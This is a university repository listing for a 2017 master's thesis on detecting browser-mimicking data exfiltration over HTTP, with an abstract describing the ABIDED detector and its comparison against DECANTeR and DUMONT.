University of Twente Student Theses
Detecting adaptive data exfiltration in HTTP traffic
Ede, Thijs S. van (2017) Detecting adaptive data exfiltration in HTTP traffic.
This is the latest version of this item.
PDF
1MB |
Abstract: | Our work introduces a new type of attack which adapts the network communication of an adversary such that it mimics communication of the applications active on an infected host. By doing so, the adversary aims to remain undetected by fully blending in with benign traffic. We demonstrate this novel attack through several case studies in which we created multiple variants of data exfiltrating malware, which adapt their communication to mimic the HTTP traffic of the browser application of the infected host. In addition, we introduce novel heuristics to detect adaptive data exfiltration and combine them in our Adaptive Browser-Imitating Data Exfiltration Detector (ABIDED). We compare our solution to DECANTeR and DUMONT, two state-of-the-art detection mechanisms which detect covert communication over HTTP. Our analysis shows that ABIDED's performance is comparable to existing solutions in detecting existing exfiltrating communication. However, it greatly improves detection of adaptive exfiltration with a detection rate of 93.3% against 5.2% for DECANTeR and 23.2% for DUMONT. Moreover, our analysis shows that the false positive rate of ABIDED is significantly lower than that of the other systems, making it a powerful solution for detecting data exfiltration. |
Item Type: | Essay (Master) |
Faculty: | EEMCS: Electrical Engineering, Mathematics and Computer Science |
Subject: | 54 computer science |
Programme: | Computer Science MSc (60300) |
Link to this item: | https://purl.utwente.nl/essays/74268 |
Export this item as: | BibTeX EndNote HTML Citation Reference Manager |
Repository Staff Only: item control page